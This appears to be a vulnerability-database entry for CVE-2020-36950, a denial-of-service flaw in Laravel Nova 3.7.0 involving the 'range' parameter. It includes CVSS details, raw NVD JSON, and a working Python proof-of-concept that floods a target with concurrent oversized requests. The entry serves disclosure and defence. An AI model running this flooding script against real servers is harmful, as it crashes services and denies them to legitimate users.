Security Vulnerability Report
CVE-2020-36950 CVSS 6.5 MEDIUM

CVE-2020-36950

Published: 2026-01-27 16:16:13
Last Modified: 2026-04-15 00:35:42

Description

Laravel Nova 3.7.0 contains a denial of service vulnerability that allows authenticated users to crash the application by manipulating the 'range' parameter. Attackers can send simultaneous requests with an extremely high range value to overwhelm and crash the server.

CVSS Details

CVSS Score (v3.1, Primary)
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Note: the raw record below also carries a secondary CVSS 4.0 metric (8.7 HIGH, PR:N) that, unlike the v3.1 vector and the description's "authenticated users", assumes no privileges are required; confirm which assumption matches your deployment before prioritising.

Configurations (Affected Products)

No structured configuration (CPE) data is available for this record; the affected versions are listed below.

Laravel Nova < 3.8.0
Laravel Nova 3.7.0 (affected version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2020-36950 Laravel Nova DoS PoC # Usage: python3 nova_dos_poc.py <target_url> <session_cookie> import requests import sys import concurrent.futures def send_dos_request(url, session_cookie): """Send a single DoS request with large range parameter""" headers = { 'Cookie': f'nova_session={session_cookie}', 'Content-Type': 'application/x-www-form-urlencoded' } # Exploit the range parameter with extreme value data = { 'range': '999999999', 'perPage': '1000' } try: response = requests.post(url, headers=headers, data=data, timeout=30) return response.status_code except requests.exceptions.RequestException as e: return f"Error: {e}" def main(): if len(sys.argv) != 3: print(f"Usage: {sys.argv[0]} <target_url> <session_cookie>") sys.exit(1) target_url = sys.argv[1] session_cookie = sys.argv[2] print(f"[*] Starting DoS attack on {target_url}") print(f"[*] Target: Laravel Nova with range parameter vulnerability") # Launch concurrent requests to overwhelm the server with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor: futures = [executor.submit(send_dos_request, target_url, session_cookie) for _ in range(100)] results = [f.result() for f in concurrent.futures.as_completed(futures)] print(f"[*] Sent {len(results)} requests") print(f"[*] Attack completed") if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36950", "sourceIdentifier": "[email protected]", "published": "2026-01-27T16:16:12.553", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Laravel Nova 3.7.0 contains a denial of service vulnerability that allows authenticated users to crash the application by manipulating the 'range' parameter. Attackers can send simultaneous requests with an extremely high range value to overwhelm and crash the server."}, {"lang": "es", "value": "Laravel Nova 3.7.0 contiene una vulnerabilidad de denegación de servicio que permite a usuarios autenticados colapsar la aplicación manipulando el parámetro 'range'. Los atacantes pueden enviar solicitudes simultáneas con un valor de 'range' extremadamente alto para sobrecargar y colapsar el servidor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": 
"NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "references": [{"url": "https://nova.laravel.com/", "source": "[email protected]"}, {"url": "https://nova.laravel.com/releases", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49198", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/laravel-nova-range-dos", "source": "[email protected]"}]}}